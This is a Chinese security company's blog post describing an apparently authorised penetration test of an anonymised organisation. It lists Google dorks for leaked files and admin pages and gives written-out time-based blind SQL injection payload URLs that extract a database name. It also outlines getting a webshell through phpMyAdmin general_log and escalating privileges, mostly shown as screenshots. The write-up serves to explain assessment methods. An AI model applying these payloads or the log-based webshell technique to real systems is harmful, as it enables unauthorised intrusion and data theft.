新闻动态

News information

【超弦挖洞】六方云超弦实验室对某单位一次真实渗透测试实践,值得学习!

<<返回

2020年04月27日 09:59

一、六方云超弦攻防实验室简介

六方云超弦攻防实验室,专注于网络攻防研究,为六方云产品、安全服务提供强力支撑。 随着云计算、大数据、人工智能等新技术的发展,超弦攻防研究实验室也赋予新的职责,持续关注和研究工控系统、云计算、大数据、工业互联网、物联网等新技术和新业务的安全威胁及解决方案。超弦攻防实验室是六方云对外提供漏洞挖掘与渗透测试服务、安全评估服务的主要力量。

二、网络渗透测试概述

网络渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现网络脆弱环节,能直观的让网络管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。

随着信息技术的发展,网络已成为一个新的战场。美国智库兰德公司称网络战为信息时代的核武器,能够在网络上引发核爆的网络战,从过去的网络威慑已经开始向实战迈进。过去美国还掖着藏着,不过近年来特朗普对敌对国家步步紧逼已经开始露出獠牙,委内瑞拉的电网瘫痪就是典型的网络战。

中国也是遭受网络攻击最多的国家之一,特别是在一些关键时期,例如每年两会期间、G20期间、以及这次新冠病毒疫情期间,我国遭受的网络攻击都要比正常事情多的多。

为了提高政府、企事业单位、关键基础设施网络等的安全性,相关单位会邀请专业安全服务公司(或自行)对其网络进行渗透测试,发现网络脆弱环节,并进行相应的整改。

接下来我们就以六方云攻防实验室受邀对某重点单位的一次渗透测试服务为例,简单介绍下网络渗透测试的过程。

三、网络渗透测试实例

3.1 信息搜集

在渗透测试中很多人常常是一上来就开始搞事情,不愿意去对目标网站或服务做过多的信息收集,这可能会导致我们找不到相应的突破点。而这就体出信息收集的意义与重要性,在我自己看来,久攻不下的网站并不是我们能力不够而是我们信息收集的不够,所以信息收集在是整个渗透测试中最重要的一步,也是非常有必要去做的一步。

3.1.1      域名收集

 (1) 域名注册人信息收集,我们可以通过whois,来收集域名持有者的一些信息,比如姓名,电话,邮箱,域名变动等等。

 (2) 子域名收集,通过在线工具,或kali中的工具不断的去收集子域名的信息寻找更多的子域名。

3.1.2      绕过CDN收集真实IP

            找旁站、情报威胁中心、超级PING、路由追踪、跨域、前端js代码、查找域名历史IP地址、以及最后的疯狂上ddos打掉cdn

            当前互联网给我们带来方便的同时也为我们造成了大量的信息泄露,而这里我们可以善用搜索引擎语法快速的找到我们想要的信息。

            (1) 搜索敏感文件

            site:xxx.com filetype:doc intext:密码

            site:xxx.com filetype:xls  intext:pass

            site:xxx.com filetype:bak

            多种组合....

            (2) 后台搜索

            site:xxx.com 管理

            site:xxx.com 登录

                 site:xxx.com inurl:admin

                 site:xxx.com inurl:login

                 多种组合...

              (3) Email搜索

                 site:xxx.com inext:@xxx.com

                 ...多种组合

              (4) 敏感路径

                  site:xxx.com inurl:phpinfo.php

                  site:xxx.com inurl:phpmyadmin

                  ...多种组合

3.1.3      服务器操作系统

3.1.4      端口开放服务识别

3.1.5      收集同站其他服务站点等

1.png

3.1.6      CIP

当我们将搜集的ip汇总下后,发现重要ip段基本都在一个c段。

2.png

xxx.xxx.22.0/24 确认这cip有可能就是目标单位的资产ip段。对这个ip 进行端口搜集

(这里端口搜集由于是整个c 、而我搜集的是1-65535目标端口、目标搜集工作量过大比较费时进行了很久、第二天才出结果)

3.png

这里跳过不必要的步骤 直接对信息搜集端口进行尝试确认哪些是可用信息。

4.png

猜测xxx.xxx.22.189ip公网ip每个端口单独映射到内网系统

 3.2 实战开始

前期搜集的资产信息越广,我们的攻击面就越多,所以 后期的成就是建立在前期的信息搜集之上。

3.2.1      首先对目标进行测试 发现官网存在sql时间盲注  

延迟注入,是一种盲注的手法提交对执行时间敏感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。

5.png

https://xxx.xxx.com/ListInfo/?classid=40&line=A%BF&lineid=if(now()=sysdate()%2Csleep(10)%2C0)&ph=1&station=

6.png

在这里 用出sqlmap 直接开跑 发现跑不出来 失败了,范围太大就精确点 手工把数据库名弄出来在跑表

7.png

首先确认数据库名称长度

需要把判断注入点 换成 if(length(database())=6%2Csleep(10)%2C0),此语法是判断数据库名称长度是否等于6,如果是沉睡10秒,如果不是不沉睡。

https://xxx.xxx.com/ListInfo/?classid=40&line=A%BF&lineid= if(length(database())=6%2Csleep(10)%2C0)&ph=1&station=

8.png

长度错误如下

9.png

得到了数据库名长度、来猜测对应字段、就需要把if(length(database())=6 换成if(ascii(substr(database(),1,1))=100,sleep(5),1)  这段的意思是if判断 数据库名称的第一位开始后推迟一位用ascii表示是否等于100,如果是就沉睡5秒,如果不是就不沉睡

最后判断如下 :数据库名称为dt_web

d

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),1,1))=100,sleep(5),1)&ph=1&station=

t

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),2,1))=116,sleep(5),1)&ph=1&station=

_

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),3,1))=95,sleep(5),1)&ph=1&station=1

w

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),4,1))=119,sleep(5),1)&ph=1&station=

e

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),5,1))=101,sleep(5),1)&ph=1&station=

b

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),6,1))=98,sleep(5),1)&ph=1&station=

 手工把数据库名称爆出来了,继续用处sqlmap 跑表。

+-------------+

| Parametre   |

| TIL_IDIOTON |

| store       |

| verkaeufer  |

+-------------+

10.png 

Sqlmap 跑出来四张表、按个对每张表进行字段猜解、跑了一段时间、没出结果。 只能手工猜解了、但是猜字段这步骤手工验证需要花费时间非常多、这个sql注入就到这里结束了。

 3.2.2      接下来又在上图找到的xxx.xxx.22.189:10037网站上发现phpmyadmin网站。该网站问题由于开发者不适当的配置,让我免登录直接进入phpmyadmin内部。

11.png

既然 phpMyAdmin成功进入、那么就可以随意查看数据库信息、篡改信息、增加信息、删除信息、脱库等一些敏感操作。

12.png

13.png

通过上图可以看到、用户密码处、似乎采用了linux用户密码同样加密的手法。 

3.2.3      知道了phpmyadmin 版本信息,借助phpmyadmin日志getshell 

1)将general_log打开

14.png

15.png

2)将日志文件自定义

问题来了 我不知道网站路径是哪个?只知道是D:\MYOA\目录如何自定义路径?

我这边用到的方法是、把数据库脱下来、在一条条匹配信息。

16.png

确认网站绝对路径为D:\MYOA\webroot\

已知网站绝对路径、我们可以直接自定义日志文件。

17.png

3)使用sql语句写入php一句话木马

18.png

4webshell工具连接

19.png

5)提升权限

20.png

3.3 测试结果

测试发现了多个漏洞,总结如下:

 image.png

四、总结

没有网络安全,就没有国家安全!并不仅仅只是一句口号,让我们一起行动起来,为国家网络安全事业做出自己的贡献!